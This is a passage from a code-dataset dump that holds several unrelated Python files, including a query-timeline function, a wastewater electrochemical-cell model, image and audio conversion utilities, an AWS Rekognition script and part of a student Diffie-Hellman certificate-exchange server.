redirect('/main/' + str(query_id))\n\ndef query_timeline(query_id):\n with connection.cursor() as cursor:\n cursor.execute(\"SELECT CONVERT_TZ(post_time, '+00:00', %s), CONVERT_TZ(appoint_time, '+00:00', %s), \"\n \"CONVERT_TZ(start_time, '+00:00', %s), CONVERT_TZ(stop_time, '+00:00', %s) FROM queries WHERE \"\n \"query_id = %s\", [user_timezone_sql, user_timezone_sql, user_timezone_sql, user_timezone_sql, query_id])\n times = cursor.fetchone()\n times = list(times)\n if times[1] == None:\n times[1] = datetime.now()\n\n if times[0].date() == times[1].date():\n new = times[1] - times[0]\n new = new.total_seconds() / 3600\n else:\n shift_end = times[0].replace(hour=15, minute=30)\n d1 = shift_end - times[0]\n shift_start = times[1].replace(hour=7, minute=0)\n d_last = times[1] - shift_start\n delta = times[1] - times[0]\n\n duration = timedelta(hours=0)\n i_date = times[0] + timedelta(hours=24)\n\n cancel = False\n while cancel == False:\n if i_date.date() == times[1].date():\n cancel = True\n else:\n if datetime.isoweekday(i_date.date()) < 6:\n duration = duration + timedelta(hours=8)\n i_date = i_date + timedelta(hours=24)\n new = d1 + duration + d_last\n new = new.total_seconds() / 3600\n\n\n if times[2] == None:\n times[2] = datetime.now()\n if times[1].date() == times[2].date():\n sent = times[2] - times[1]\n sent = sent.total_seconds() / 3600\n else:\n shift_end = times[1].replace(hour=15, minute=30)\n d1 = shift_end - times[1]\n shift_start = times[2].replace(hour=7, minute=0)\n d_last = times[2] - shift_start\n delta = times[2] - times[0]\n duration2 = timedelta(hours=0)\n i_date = times[1] + timedelta(hours=24)\n cancel = False\n while cancel == False:\n if i_date.date() == times[2].date():\n cancel = True\n else:\n if datetime.isoweekday(i_date.date()) < 6:\n duration2 = duration2 + timedelta(hours=8)\n i_date = i_date + timedelta(hours=24)\n sent = d1 + duration2 + d_last\n sent = sent.total_seconds() / 3600\n\n if times[3] == None:\n times[3] = datetime.now()\n if times[2].date() == times[3].date():\n process = times[3] - times[2]\n process = process.total_seconds() / 3600\n else:\n shift_end = times[2].replace(hour=15, minute=30)\n d1 = shift_end - times[2]\n shift_start = times[3].replace(hour=7, minute=0)\n d_last = times[3] - shift_start\n delta = times[3] - times[0]\n duration3 = timedelta(hours=0)\n i_date = times[2] + timedelta(hours=24)\n cancel = False\n while cancel == False:\n if i_date.date() == times[3].date():\n cancel = True\n else:\n if datetime.isoweekday(i_date.date()) < 6:\n duration3 = duration2 + timedelta(hours=8)\n i_date = i_date + timedelta(hours=24)\n process = d1 + duration3 + d_last\n process = process.total_seconds() / 3600\n\n return new, sent, process\n","sub_path":"main/query_funcs.py","file_name":"query_funcs.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"556695454","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'''\nQSDsan: Quantitative Sustainable Design for sanitation and resource recovery systems\n\nThis module is developed by:\n Smiti Mittal \n Yalin Li \n Anna Kogler\n \nThis module is under the University of Illinois/NCSA Open Source License.\nPlease refer to https://github.com/QSD-Group/QSDsan/blob/master/LICENSE.txt\nfor license details.\n'''\n\n# %%\n\nimport math\nfrom .. import Equipment, SanUnit, Component, WasteStream\n\n__all__ = ('ElectrochemicalCell',)\n\n# %%\n\nclass ElectrochemicalCell(SanUnit):\n\n '''\n \n Electrochemical cell for nutrient recovery.\n\n This unit has the following equipment:\n - :class:`Electrode`\n - :class: `Membrane`\n - :class: `Column`\n - :class: `Machine`\n\n Parameters\n ----------\n recovery : dict\n Keys refer to chemical component IDs. Values refer to recovery fractions (with 1 being 100%) for the respective chemicals.\n removal : dict\n Keys refer to chemical component IDs. Values refer to removal fractions (with 1 being 100%) for the respective chemicals.\n equipments : list\n List of Equipment objects part of the Electrochemical Cell.\n OPEX_over_CAPEX : float\n Ratio with which operating costs are calculated as a fraction of capital costs\n \n Example\n -------\n >>> # Set components\n >>> import qsdsan as qs\n >>> kwargs = dict(particle_size='Soluble',\n ... degradability='Undegradable',\n ... organic=False)\n >>> H2O = qs.Component.from_chemical('H2O', phase='l', **kwargs)\n >>> NH3 = qs.Component.from_chemical('NH3', phase='g', **kwargs)\n >>> NH3.particle_size = 'Dissolved gas'\n >>> NH4OH = qs.Component.from_chemical('NH4OH', phase='l', **kwargs)\n >>> H2SO4 = qs.Component.from_chemical('H2SO4', phase='l', **kwargs)\n >>> AmmoniumSulfate = qs.Component.from_chemical('AmmoniumSulfate', phase='l',\n ... **kwargs)\n >>> CleaningAgent = qs.Component('CleaningAgent', MW=1, phase='l', **kwargs)\n >>> cmps = qs.Components((H2O, NH3, NH4OH, H2SO4, AmmoniumSulfate, CleaningAgent))\n >>> # Assuming all has the same molar volume as water for demonstration purpose\n >>> for cmp in cmps:\n ... cmp.copy_models_from(H2O, names=['V'])\n ... cmp.default()\n >>> qs.set_thermo(cmps)\n >>> # Set waste streams\n >>> influent = qs.WasteStream('influent', H2O=1000, NH4OH=50)\n >>> cleaning_agent = qs.WasteStream('cleaning_agent', price=5)\n >>> # Set equipments\n >>> anode = qs.equipments.Electrode(name='anode', N=1, electrode_type='anode',\n ... material='graphite', surface_area=10)\n >>> cathode = qs.equipments.Electrode(name='cathode', N=1, electrode_type='cathode',\n ... material='carbon', surface_area=10, unit_cost=1)\n >>> membrane = qs.equipments.Membrane(name='membrane', N=2,\n ... material='polyethylene', unit_cost=0.2, surface_area=1)\n >>> column = qs.equipments.Column(name='column1', N=3,\n ... material='resin', unit_cost=2, surface_area=20)\n >>> machine = qs.equipments.Machine(name='fan', N=1, unit_cost=3)\n >>> # Set the unit\n >>> U1 = ElectrochemicalCell('U1', ins=(influent, cleaning_agent),\n ... outs=('rec', 'rem', 'leftover'),\n ... recovery={'NH4OH':0.6}, removal={'NH4OH':0.2},\n ... equipments=(anode, cathode, membrane, column, machine), OPEX_over_CAPEX = 0.2)\n >>> # Simulate and look at the results\n >>> U1.simulate()\n >>> U1.diagram()\n \n >>> U1.show()\n ElectrochemicalCell: U1\n ins...\n [0] influent\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): H2O 1e+06\n NH4OH 5e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 19424.5 mg/L\n TKN : 19424.5 mg/L\n [1] cleaning_agent\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow: 0\n\n WasteStream-specific properties: None for empty waste streams\n outs...\n [0] rec\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): NH4OH 3e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 775169.7 mg/L\n TKN : 775169.7 mg/L\n [1] rem\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): NH4OH 1e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 775169.7 mg/L\n TKN : 775169.7 mg/L\n [2] leftover\n phase: 'l', T: 298.15 K, P: 101325 Pa\n flow (g/hr): H2O 1e+06\n NH4OH 1e+04\n\n WasteStream-specific properties:\n pH : 7.0\n TN : 3964.4 mg/L\n TKN : 3964.4 mg/L\n >>> U1.results()\n Electro chem cell Units U1\n Design Type of electrode\t\t cathode\n Number of anode 1\n Material of anode graphite\n Surface area of anode m2 10\n Number of cathode 1\n Material of cathode carbon\n Surface area of cathode m2 10\n Number of membrane 2\n Material of membrane polyethylene\n Surface area of membrane m2 1\n Number of column1 3\n Material of column1 resin\n Surface area of column1 m2 20\n Number of fan 1\n Purchase cost anode USD 0.1\n cathode USD 1\n membrane USD 0.4\n column1 USD 120\n fan USD 3\n Total purchase cost USD 124\n Utility cost USD/hr 0\n Additional OPEX\t\t USD/hr\t 24.7\n\n '''\n\n def __init__(self, ID='', ins=None, outs=(), recovery={'NH3':0.6}, removal={'NH3':0.2},\n equipments=(), OPEX_over_CAPEX=0):\n if isinstance(equipments, Equipment):\n equipments = (equipments,)\n SanUnit.__init__(self=self, ID=ID, ins=ins, outs=outs, equipments=equipments)\n self.recovery = recovery\n self.removal = removal\n self.OPEX_over_CAPEX = OPEX_over_CAPEX\n\n _N_ins = 2\n _N_outs = 3\n\n def _run(self):\n influent, cleaner = self.ins\n recovered, removed, left = self.outs[0], self.outs[1], self.outs[2]\n\n mixture = WasteStream()\n mixture.mix_from(self.ins)\n left.copy_like(mixture)\n\n for chemical, ratio in self.recovery.items():\n recovered.imass[chemical] = mixture.imass[chemical]*ratio\n left.imass[chemical] = left.imass[chemical]-mixture.imass[chemical]*ratio\n\n for chemical, ratio in self.removal.items():\n removed.imass[chemical] = mixture.imass[chemical]*ratio\n left.imass[chemical] = left.imass[chemical]-mixture.imass[chemical]*ratio\n\n def _design(self):\n self.add_equipment_design()\n\n def _cost(self):\n self.add_equipment_cost()\n self.equip_costs = self.baseline_purchase_costs.values()\n add_OPEX = sum(self.equip_costs)*self.OPEX_over_CAPEX\n self._add_OPEX = {'Additional OPEX': add_OPEX}\n","sub_path":"qsdsan/sanunits/_electrochemical_cell.py","file_name":"_electrochemical_cell.py","file_ext":"py","file_size_in_byte":8080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"99509823","text":"from PIL import Image, ImageFilter\n\nTMP = \"/tmp/\"\n\n\ndef flip(image, file_name):\n path_list = []\n path = TMP + \"flip-left-right-\" + file_name\n img = image.transpose(Image.FLIP_LEFT_RIGHT)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"flip-top-bottom-\" + file_name\n img = image.transpose(Image.FLIP_TOP_BOTTOM)\n img.save(path)\n path_list.append(path)\n\n return path_list\n\n\ndef rotate(image, file_name):\n path_list = []\n path = TMP + \"rotate-90-\" + file_name\n img = image.transpose(Image.ROTATE_90)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"rotate-180-\" + file_name\n img = image.transpose(Image.ROTATE_180)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"rotate-270-\" + file_name\n img = image.transpose(Image.ROTATE_270)\n img.save(path)\n path_list.append(path)\n\n return path_list\n\n\ndef filter(image, file_name):\n path_list = []\n path = TMP + \"blur-\" + file_name\n img = image.filter(ImageFilter.BLUR)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"contour-\" + file_name\n img = image.filter(ImageFilter.CONTOUR)\n img.save(path)\n path_list.append(path)\n\n path = TMP + \"sharpen-\" + file_name\n img = image.filter(ImageFilter.SHARPEN)\n img.save(path)\n path_list.append(path)\n\n return path_list\n\n\ndef gray_scale(image, file_name):\n path = TMP + \"gray-scale-\" + file_name\n img = image.convert('L')\n img.save(path)\n return [path]\n\n\ndef resize(image, file_name):\n path = TMP + \"resized-\" + file_name\n image.thumbnail((128, 128))\n image.save(path)\n return [path]\n","sub_path":"aws/cpu-memory/image_processing/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187602380","text":"#!/usr/bin/env python\n\nimport boto3 \nimport json\nimport os, sys\nimport image\nimport re\nimport thread\nimport requests\n\ndef replace_element(lst, new_element, indices):\n\tfor i in indices:\n\t\tlst[i] = new_element\n\treturn lst\n\ndef sendRequest(url, paramas):\n r = requests.post(url, data=paramas)\n print(r)\n\ndef imageRekogniser(imageurl):\n\n\tf = open(\"{}\".format(imageurl))\n\t# rek = boto3.client('rekognition')\n\t# readfile = f.read()\n\trek = boto3.client('rekognition', region_name='us-west-2', aws_access_key_id=\"IDHERE\", aws_secret_access_key=\"APIKEYHERE\")\n\treadfile = f.read()\n\tresults2 = rek.detect_faces( \n\t Image={\n\t 'Bytes': readfile\n\t },\n\t Attributes=[\n\t 'ALL',\n\t]\n\t)\n\n\tjsonDatastring = json.dumps(results2['FaceDetails'], indent=2)\n\tjsonData = json.loads(jsonDatastring)\n\n\tif len(jsonData) == 0:\n\t\tresults3 = rek.detect_labels( \n\t\t Image={\n\t\t 'Bytes': readfile\n\t\t },\n\t\t MaxLabels=15,\n\t \tMinConfidence=60\n\t\t)\n\n\t\tobjectsDictionaryArray = []\n\t\tjsonData2 = json.dumps(results3, indent=2)\n\t\tnewData2 = json.loads(jsonData2)\n\t\tobjects = newData2[\"Labels\"]\n\n\t\tfor i in objects:\n\t\t\tnameOfObject = i.get(\"Name\")\n\t\t\tobjectsDictionaryArray.append(nameOfObject)\n\t\tjointString = ', '.join(objectsDictionaryArray[:len(objectsDictionaryArray)-1])\n\t\tlastElement = '{}'.format(objectsDictionaryArray[len(objectsDictionaryArray)-1])\n\t\tprint(\"Your environment contains a {} and a {}\".format(jointString, lastElement))\n\t\t\t\n\telse:\n\n\t\tjsonDataa = json.dumps(results2['FaceDetails'][0], indent=2)\n\t\tnewData = json.loads(jsonDataa)\n\t\temotions = newData[\"Emotions\"]\n\t\tgender = newData[\"Gender\"]\n\n\t\tHighageRange = newData[\"AgeRange\"][\"High\"]\n\t\tLowageRange = newData[\"AgeRange\"][\"Low\"]\n\t\taverageAge = (HighageRange+LowageRange)/2\n\t\teveryemotionArray = []\n\t\tgenderArray = []\n\t\tgenderArray.append(gender)\n\n\t\tfor i in emotions:\n\t\t\teveryemotionArray.append(i)\n\n\t\tsingleEmotion = everyemotionArray[0]\n\t\tconf = singleEmotion[\"Confidence\"]\n\n\t\tvalueofgender = genderArray[0]\n\t\tconf2 = valueofgender[\"Value\"]\n\n\t\tn = conf*0.01\n\t\temotion = \"\"\n\n\n\t\tif singleEmotion[\"Type\"] == \"SAD\" or singleEmotion[\"Type\"] == \"CONFUSED\" or singleEmotion[\"Type\"] == \"ANGRY\" or singleEmotion[\"Type\"] == \"DISGUSTED\":\n\t\t\temotion = singleEmotion[\"Type\"]\n\t\t\tprint((1/n)-1)\n\t\telif singleEmotion[\"Type\"] == \"HAPPY\" or singleEmotion[\"Type\"] == \"SURPRISED\" or singleEmotion[\"Type\"] == \"CALM\":\n\t\t\temotion = singleEmotion[\"Type\"]\n\t\t\tprint(n)\n\t\telse:\n\t\t\tprint(0.5)\n\n\t\tresults3 = rek.detect_labels( \n\t\t Image={\n\t\t 'Bytes': readfile\n\t\t },\n\t\t MaxLabels=10,\n\t \tMinConfidence=60\n\t\t)\n\n\t\tlowercaseemotion = emotion.lower()\n\n\t\tobjectsDictionaryArray = []\n\t\tjsonData2 = json.dumps(results3, indent=2)\n\t\tnewData2 = json.loads(jsonData2)\n\t\tobjects = newData2[\"Labels\"]\n\n\t\tfor i in objects:\n\t\t\tnameOfObject = i.get(\"Name\")\n\t\t\tobjectsDictionaryArray.append(nameOfObject)\n\n\t\ttraits = ', '.join(objectsDictionaryArray[2:3])\n\t\tmoretraits = ','.join(objectsDictionaryArray[3:len(objectsDictionaryArray)-2])\n\t\tlastElement = '{}'.format(objectsDictionaryArray[len(objectsDictionaryArray)-1])\n\n\t\tbigstring = (\"Your environment contains a {} {} with {}, {} and an average age of {} with {} gender. \".format(lowercaseemotion, traits, moretraits, lastElement, averageAge, conf2))\n\t\tprint(bigstring)\n\t\tprint(jsonDataa)\n # sendRequest('http://178.62.14.170:4242/capture', {'valence': n, 'finalString': bigstring})\n\nif __name__ == '__main__':\n\n\tmethodname = sys.argv[1]\n\timageRekogniser(methodname)\n\n\n\n","sub_path":"amazonwebbucket.py","file_name":"amazonwebbucket.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"9868671","text":"\"\"\"\nMethod: Heatmap\nData Variables: Random \nAuthor: Rustam Tukhvatov\n\"\"\"\n\nimport numpy as np\nimport numpy.random\nimport matplotlib.pyplot as plt\n\nx = np.random.randn(8000)\ny = np.random.randn(8000)\n\nheatmap, xedges, yedges = np.histogram2d(x, y, bins=50)\nextent = [xedges[0], xedges[-1], yedges[0], yedges[-1]]\n\nplt.clf()\nplt.imshow(heatmap.T, extent=extent, origin='lower')\nplt.title(\"Heatmap\")\nplt.show()\n","sub_path":"lab2/heatmap_2.py","file_name":"heatmap_2.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"501657386","text":"name = \"pyaudioconvert\"\n\nimport os, subprocess, tempfile, uuid\nfrom os import listdir\nfrom os.path import isfile, join\nimport scipy\nimport scipy.io.wavfile as wav\n\nRUN_ID = str(uuid.uuid4())[:4]\n\n# check that sox is installed\ndef bool_which(program):\n\n def is_exe(fpath):\n return os.path.isfile(fpath) and os.access(fpath, os.X_OK)\n\n fpath, fname = os.path.split(program)\n if fpath:\n if is_exe(program):\n return True\n else:\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe_file = os.path.join(path, program)\n if is_exe(exe_file):\n return True\n\n return False\n\n\nclass SoxNotInstalled(Exception):\n pass\n\n\nclass InvalidNonReadableFile(Exception):\n pass\n\n\nclass OverwriteFileError(Exception):\n pass\n\n\ntry:\n assert(bool_which('sox'))\nexcept AssertionError:\n raise SoxNotInstalled()\n\n\ndef _valid_readable_file(file_path):\n # returns false if file does not exist or is not readable (note python can return true/false on a real file)\n if not (os.path.isfile(file_path) and os.access(file_path, os.R_OK)):\n return False\n else:\n # else returns true if file exists and readable\n return True\n\n\n# def _valid_audiofile(audio_file_path):\n# return _valid_readable_file(audio_file_path)\n\n\ndef _is_24bit_audio(audio_file_path):\n\n # todo what about non-wavs?\n\n try:\n _, _ = scipy.io.wavfile.read(audio_file_path)\n except ValueError:\n return True\n\n\ndef _get_mono_audio_only(audio_file_path, selected_channel=0):\n rate, data = scipy.io.wavfile.read(audio_file_path)\n try:\n nchannels = data.shape[1]\n except IndexError:\n nchannels = 1\n\n if nchannels != 1:\n return data[:, selected_channel]\n\n return data\n\n\ndef _get_safe_temp_file():\n\n # todo - how to ensure safe file and no race conditions?\n tempdir = tempfile.gettempdir()\n full_temp_path = os.path.join(tempdir, RUN_ID + str(uuid.uuid4()) + '.wav')\n\n # check is not already a file\n if os.path.isfile(full_temp_path):\n # unlikely condition but if this happens we can recreate another\n full_temp_path = os.path.join(tempdir, RUN_ID + str(uuid.uuid4()) +'_' + str(uuid.uuid1()) + '.wav')\n\n return full_temp_path\n\ndef _get_audio_sample_rate(wav_file):\n rate, _ = scipy.io.wavfile.read(wav_file)\n return rate\n\ndef convert_all_wavs_in_folder(path_location='.', selected_channel=0, sr=16000, overwrite_existing=True):\n\n '''\n\n :param path_location: If no path is given it will assume current directory\n :param sr: SR defaults to 16k\n :param overwrite_existing: Will overwrite existing wavs by default (unless turned off)\n :return:\n '''\n\n wav_files = [f for f in listdir(path_location) if f.endswith('wav')]\n sr_suffix = str(sr)[0:2]\n\n for wav in wav_files:\n print(wav)\n\n new_file_path = wav[:-4] + \"ch{}_{}k.wav\".format(selected_channel, sr_suffix)\n\n if os.path.isfile(new_file_path):\n\n if overwrite_existing:\n print(convert_wav_to_16bit_mono(wav, new_file_path, selected_channel, sr=sr))\n else:\n raise OverwriteFileError\n\n else:\n print(convert_wav_to_16bit_mono(wav, new_file_path, selected_channel, sr=sr))\n\n\ndef convert_wav_to_16bit_mono(old_wav_path, new_wav_path, selected_channel=0, sr=16000, overwrite_existing=True):\n\n '''\n\n :param old_wav_path: The original wav file that needs converting\n :param new_wav_path: The new path or name of the wav to be used\n :param sr: The sample rate (default is 16k)\n :param overwrite_existing: Will overwrite existing wavs by default (unless turned off)\n :return: Returns the name of the new wav on successful creation\n\n Example usage:\n >>> import pyaudioconvert as pac\n >>> pac.convert_wav_to_16bit_mono('example_24bit_48k_2ch.wav', 'example_16bit_16k_1ch.wav')\n Out[2]: 'example_16bit_16k_1ch.wav'\n\n '''\n\n\n temp_file1_notused = False\n temp_file2_notused = False\n\n # 0. CHECK - validate audiofile\n try:\n assert(_valid_readable_file(old_wav_path))\n except AssertionError:\n raise InvalidNonReadableFile\n\n # 1. CHECK - is24bit?\n if _is_24bit_audio(old_wav_path):\n # if 24bit we must convert to 16bit\n # create new safe temp file\n full_temp_path = _get_safe_temp_file()\n # use sox to convert\n subprocess.call([\"sox\", old_wav_path, '--encoding=signed-integer', '--bits=16', '--type=wav', full_temp_path], stderr=subprocess.STDOUT)\n\n else:\n # 16bit\n temp_file1_notused = True\n full_temp_path = old_wav_path\n\n # 2. SET SAMPLE RATE\n if _get_audio_sample_rate(full_temp_path) != sr:\n final_full_temp_path = _get_safe_temp_file()\n subprocess.call([\"sox\", full_temp_path, '--type=wav', '--rate={}'.format(sr), final_full_temp_path], stderr=subprocess.STDOUT)\n else:\n temp_file2_notused = True\n final_full_temp_path = full_temp_path\n\n # 3. get mono Audio only & save\n mono_audio = _get_mono_audio_only(final_full_temp_path, selected_channel)\n\n if os.path.isfile(new_wav_path):\n if overwrite_existing:\n scipy.io.wavfile.write(new_wav_path, sr, mono_audio)\n else:\n raise(OverwriteFileError)\n else:\n scipy.io.wavfile.write(new_wav_path, sr, mono_audio)\n\n # cleanup temp & finaltemp\n if temp_file1_notused == False:\n os.remove(full_temp_path)\n\n if temp_file2_notused == False:\n os.remove(final_full_temp_path)\n\n return new_wav_path\n","sub_path":"venv/Lib/site-packages/pyaudioconvert/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"490108469","text":"#!/usr/bin/env python\nimport numpy as np\nimport datetime, time, os\nfrom bcp.parse import _make_fp, promethion_to_array, append_to_npy\n\nbase_fp = '/Users/wdwvt/Desktop/Sonnenburg/cumnock/bcp/data/validation/raw_data/'\nfps = [base_fp + 'no_animals_011816_am.txt',\n base_fp + 'no_animals_011816_pm.txt',\n base_fp + 'no_animals_011916.txt']\n\ncages = list(map(str, [1, 2, 3, 4, 5, 6, 7, 8]))\nfields = ['XPos', 'YPos', 'ZPos', 'WheelCount', 'FoodA', 'Water', 'BodyMass']\n\noutput_base_fp = '/Users/wdwvt/Desktop/Sonnenburg/cumnock/bcp/data/validation/'\n\n# Create empty arrays to intialize files.\nfor cage in cages:\n for field in fields:\n fp = _make_fp(output_base_fp, field, cage)\n np.save(fp, np.array([]))\ntime_fp = os.path.join(output_base_fp, 'time.npy')\nnp.save(os.path.join(output_base_fp, 'time.npy'), np.array([]))\n\n# Read new data and append it to the arrays.\nfor fp in fps:\n t0 = time.time()\n f = os.path.join(base_fp, fp)\n data, times, keys = promethion_to_array(fp, cages, fields, \n start_timestamp='1/18/2016 13:29:09')\n new_time_arr = append_to_npy(times, time_fp, append=True)\n np.save(time_fp, new_time_arr)\n for col, key in zip(data.T, keys):\n field, cage = key.split('_')\n _out_fp = _make_fp(output_base_fp, field, cage)\n new_arr = append_to_npy(col, _out_fp, append=True)\n np.save(_out_fp, new_arr)\n t1 = time.time()\n print('took: %s' % (t1 - t0))","sub_path":"data/validation/convert_raw_to_arrays.py","file_name":"convert_raw_to_arrays.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"372627146","text":"# Código baseado em https://docs.python.org/3.6/library/asyncio-stream.html#tcp-echo-client-using-streams\nimport asyncio\nimport os\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC\nfrom cryptography.hazmat.primitives import hashes, hmac\nfrom random import choice\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import dh\nfrom cryptography.hazmat.primitives.kdf.hkdf import HKDF\nimport sys\nimport time\nfrom OpenSSL import crypto\nfrom random import randint\nfrom ctypes import string_at\nfrom sys import getsizeof\nfrom binascii import hexlify\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives.serialization import load_pem_public_key\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import serialization\nimport re\nfrom base64 import (\n b64encode,\n b64decode,\n)\n\nimport ssl, socket\nfrom cryptography import x509\nbackend = default_backend()\nconn_cnt = 0\nconn_port = 8888\nmax_msg_size = 9999\n\np=99494096650139337106186933977618513974146274831566768179581759037259788798151499814653951492724365471316253651463342255785311748602922458795201382445323499931625451272600173180136123245441204133515800495917242011863558721723303661523372572477211620144038809673692512025566673746993593384600667047373692203583\ng=44157404837960328768872680677686802650999163226766694797650810379076416463147265401084491113667624054557335394761604876882446924929840681990106974314935015501571333024773172440352475358750668213444607353872754650805031912866692119819377041901642732455911509867728218394542745330014071040326856846990119719675\n\n\nwith open(\"Server_priv_key.bin\", \"rb\") as key_file:\n server_private_key = serialization.load_pem_private_key(\n key_file.read(),\n password=None,\n backend=default_backend()\n ) \n\nwith open(\"Client_public_key.bin\", \"rb\") as key_file2: ##key public do cliente proveniente do script gerador\n public_client = serialization.load_pem_public_key(\n key_file2.read(),\n backend=default_backend()\n )\n\nserv_SSL=crypto.load_pkcs12(open(\"Servidor.p12\",\"rb\").read(),\"uminho\")#abrir ficheiro do servidor\ncert_serv=serv_SSL.get_certificate()#certificado servidor\ncert_serv_pem=crypto.dump_certificate(crypto.FILETYPE_PEM, cert_serv)#texto do certificado do cliente\n\nprivate_key=serv_SSL.get_privatekey()\nprivate_key_pem=crypto.dump_privatekey(crypto.FILETYPE_PEM, private_key)\n\ncert_cryptography = x509.load_pem_x509_certificate(cert_serv_pem, default_backend())\n\n\nprivate_key_serv_SSL= serialization.load_pem_private_key(private_key_pem, None, default_backend())\n\n\nCA_cer = crypto.load_certificate(crypto.FILETYPE_PEM,open('ca-chain.cert.pem','rb').read())#certificado CA\nCA_pem = crypto.dump_certificate(crypto.FILETYPE_PEM, CA_cer)#certificado CA em pem\n\nCA_inter_cer = crypto.load_certificate(crypto.FILETYPE_PEM,open('ca-chain.cert-inter.pem','rb').read())#certificado CA\nCA_inter_pem = crypto.dump_certificate(crypto.FILETYPE_PEM, CA_cer)#certificado CA em pem\n\nstore=crypto.X509Store()\n\nstore.add_cert(CA_cer)\nstore.add_cert(CA_inter_cer)\n\n\nclass ServerWorker(object):\n \"\"\" Classe que implementa a funcionalidade do SERVIDOR. \"\"\"\n def __init__(self, cnt, addr=None):\n \"\"\" Construtor da classe. \"\"\"\n self.id = cnt\n self.addr = addr\n self.msg_cnt = 0\n \n def process(self, msg):\n stbyte=\"-0-\"\n stbyte1=stbyte.encode()\n \n if msg.startswith(stbyte1):\n self.msg_cnt += 1\n self.id_cliente=msg[3:4]\n public_key_client=int(str(msg[4:312].decode()))\n \n \n \n\n id_c=self.id_cliente\n pn = dh.DHParameterNumbers(p, g)\n parameters = pn.parameters(default_backend())\n \n private_key = parameters.generate_private_key()\n public_key=private_key.public_key()\n public_key_serv=private_key.public_key().public_numbers().y \n \n peer_public_numbers=dh.DHPublicNumbers(public_key_client,pn)\n peer_key=peer_public_numbers.public_key(default_backend())\n shared_key=private_key.exchange(peer_key) \n\n derived_key = HKDF(\n algorithm=hashes.SHA512(),\n length=32,\n salt=None,\n info=b'handshake data',\n backend=default_backend()\n ).derive(shared_key)\n \n\n startb='-1-'\n new_msg=startb.encode()+str(public_key_serv).encode()+cert_serv_pem\n \n self.key1=derived_key[0:16]\n self.key_mac=derived_key[16:32] \n\n return new_msg\n process()\n\n else:\n \n \n self.msg_cnt += 1\n iv_cl = msg[0:16] #apos o envio da priḿeira mensagem de texto, sao divididos os parametros que a constituem\n mac_cli=msg[16:80]\n signature=msg[80:336]\n cert_cli_pem=msg[336:2308] \n texto=msg[2308:] \n\n\n #certificado client\n cert_cryptography_c = x509.load_pem_x509_certificate(cert_cli_pem, default_backend())\n #chave publica client\n public_cli_SSL=cert_cryptography_c.public_key()\n \n\n \n cipher = Cipher(algorithms.AES(self.key1), modes.CTR(iv_cl), backend=backend)\n decryptor = cipher.decryptor()\n txt=decryptor.update(texto)\n \n\n\n cert_cli_object=crypto.load_certificate( \n crypto.FILETYPE_PEM, \n cert_cryptography_c.public_bytes(serialization.Encoding.PEM)) \n\n \n\n store_c=crypto.X509StoreContext(store,cert_cli_object)\n result_client=store_c.verify_certificate()#Verfica o certificado do cliente\n \n subject = cert_cli_object.get_subject()\n issued_to = subject.CN #autor do certificado\n\n if result_client is None:\n if(issued_to == 'Cliente'):\n print(\"Certificado do %r verificado com sucesso\" % (issued_to))\n \n else:\n print(\"ERRO: Certificado do Cliente nao verificado\")\n writer.close()\n\n #verificar\n public_cli_SSL.verify(\n signature,\n txt,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n\n print('Utilizador %r : %r' % (self.id_cliente.decode(),txt.decode()))\n \n iv_s = os.urandom(16)\n cipher = Cipher(algorithms.AES(self.key1), modes.CTR(iv_s), backend=backend)\n encryptor = cipher.encryptor()\n ct = encryptor.update(txt) + encryptor.finalize()\n\n\n ####################################\n #HMAC\n h=hmac.HMAC(self.key_mac,hashes.SHA512(),backend=default_backend())\n h.update(ct)\n mac_serv = h.finalize() \n\n #assinar\n signature_s = private_key_serv_SSL.sign(\n txt,\n padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()),\n salt_length=padding.PSS.MAX_LENGTH\n ),\n hashes.SHA256()\n )\n\n #print(len(cert_serv_pem))\n #print(\"tamanho sign:\",len(signature))\n new_msg = iv_s+mac_serv+signature_s+cert_serv_pem+ct\n \n return new_msg if len(new_msg)>0 else None\n process()\n \n \n#\n#\n# Funcionalidade Cliente/Servidor\n#\n# obs: não deverá ser necessário alterar o que se segue\n#\n\n@asyncio.coroutine\ndef handle_echo(reader, writer):\n global conn_cnt\n conn_cnt +=1\n addr = writer.get_extra_info('peername')\n srvwrk = 